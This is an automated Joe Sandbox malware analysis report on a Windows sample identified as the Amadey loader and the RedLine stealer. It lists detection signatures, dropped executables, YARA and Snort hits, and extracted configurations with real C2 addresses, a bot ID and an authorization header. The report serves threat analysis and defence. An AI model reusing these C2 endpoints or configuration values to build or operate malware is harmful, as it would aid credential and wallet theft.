Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:803670
MD5:e46fc629e1740020f4cb10f793d38689
SHA1:b0bc2f9f5ad244c3c15160b389a66252adab9e0c
SHA256:f488772ca9291e830b797022be6c0c808e8963654276eb7c2c117279b41b69af
Tags:exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Disable Windows Defender real time protection (registry)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 4892 cmdline: C:\Users\user\Desktop\file.exe MD5: E46FC629E1740020F4CB10F793D38689)
    • fuN31PL.exe (PID: 1636 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe MD5: 1EA737E1D6A95AA35583293A9A2F5347)
      • fDI32WO.exe (PID: 5960 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe MD5: 156433A80D154CC7554D6D4E75C8E045)
        • aRe53.exe (PID: 5964 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
        • bAS06bx.exe (PID: 1256 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe MD5: EF8079CF160510D0DA7162BC08F753D8)
  • rundll32.exe (PID: 2244 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5308 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5928 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"C2 url": "193.233.20.11:4131", "Bot Id": "dubna", "Authorization Header": "f324b1269094b7462e56bab025f032f4"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1a440:$pat14: , CommandLine:
          • 0x134a1:$v2_1: ListOfProcesses
          • 0x13280:$v4_3: base64str
          • 0x13df9:$v4_4: stringKey
          • 0x11b63:$v4_5: BytesToStringConverted
          • 0x10d76:$v4_6: FromBase64
          • 0x12098:$v4_8: procName
          • 0x12813:$v5_5: FileScanning
          • 0x11d6c:$v5_7: RecordHeaderField
          • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
          SourceRuleDescriptionAuthorStrings
          00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  Process Memory Space: bAS06bx.exe PID: 1256JoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 1 entries
                    SourceRuleDescriptionAuthorStrings
                    2.3.fDI32WO.exe.45dfc20.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      2.3.fDI32WO.exe.45dfc20.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1a440:$pat14: , CommandLine:
                      • 0x134a1:$v2_1: ListOfProcesses
                      • 0x13280:$v4_3: base64str
                      • 0x13df9:$v4_4: stringKey
                      • 0x11b63:$v4_5: BytesToStringConverted
                      • 0x10d76:$v4_6: FromBase64
                      • 0x12098:$v4_8: procName
                      • 0x12813:$v5_5: FileScanning
                      • 0x11d6c:$v5_7: RecordHeaderField
                      • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                      2.3.fDI32WO.exe.45dfc20.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        2.3.fDI32WO.exe.45dfc20.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                        • 0x18840:$pat14: , CommandLine:
                        • 0x118a1:$v2_1: ListOfProcesses
                        • 0x11680:$v4_3: base64str
                        • 0x121f9:$v4_4: stringKey
                        • 0xff63:$v4_5: BytesToStringConverted
                        • 0xf176:$v4_6: FromBase64
                        • 0x10498:$v4_8: procName
                        • 0x10c13:$v5_5: FileScanning
                        • 0x1016c:$v5_7: RecordHeaderField
                        • 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                        0.3.file.exe.4ce3420.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          Click to see the 3 entries
                          No Sigma rule has matched
                          Timestamp:193.233.20.11192.168.2.44131496962043234 02/10/23-06:58:48.059056
                          SID:2043234
                          Source Port:4131
                          Destination Port:49696
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.4193.233.20.114969641312043231 02/10/23-06:58:59.386011
                          SID:2043231
                          Source Port:49696
                          Destination Port:4131
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.4193.233.20.114969641312043233 02/10/23-06:58:46.675190
                          SID:2043233
                          Source Port:49696
                          Destination Port:4131
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: file.exeReversingLabs: Detection: 69%
                          Source: file.exeVirustotal: Detection: 58%Perma Link
                          Source: file.exeAvira: detected
                          Source: 193.233.20.11:4131Avira URL Cloud: Label: malware
                          Source: 193.233.20.11:4131Virustotal: Detection: 6%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exeReversingLabs: Detection: 79%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exeVirustotal: Detection: 81%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeReversingLabs: Detection: 69%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeVirustotal: Detection: 54%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exeReversingLabs: Detection: 33%
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exeVirustotal: Detection: 49%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeReversingLabs: Detection: 64%
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeReversingLabs: Detection: 84%
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeReversingLabs: Detection: 96%
                          Source: file.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeJoe Sandbox ML: detected
                          Source: 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.20.11:4131", "Bot Id": "dubna", "Authorization Header": "f324b1269094b7462e56bab025f032f4"}
                          Source: 0.3.file.exe.4ce3420.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00972F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_001A2F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A82F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00A82F1D
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: wextract.pdb source: file.exe, fDI32WO.exe.1.dr, fuN31PL.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, dXL24Wx.exe.0.dr
                          Source: Binary string: wextract.pdbGCTL source: file.exe, fDI32WO.exe.1.dr, fuN31PL.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: fDI32WO.exe, 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, aRe53.exe, 00000003.00000000.308600922.00000000005E2000.00000002.00000001.01000000.00000006.sdmp, aRe53.exe.2.dr
                          Source: Binary string: C:\setilikavegor\mixu76 bej yovesuwudel89 vifohe.pdb source: fuN31PL.exe, 00000001.00000003.307160395.0000000004794000.00000004.00000020.00020000.00000000.sdmp, cfh9400.exe.1.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00972390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_001A2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00A82390

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49696 -> 193.233.20.11:4131
                          Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49696 -> 193.233.20.11:4131
                          Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.11:4131 -> 192.168.2.4:49696
                          Source: Malware configuration extractorURLs: 62.204.41.4/Gol478Ns/index.php
                          Source: Malware configuration extractorURLs: 193.233.20.11:4131
                          Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
                          Source: Joe Sandbox ViewIP Address: 193.233.20.11 193.233.20.11
                          Source: global trafficTCP traffic: 192.168.2.4:49696 -> 193.233.20.11:4131
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.11
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
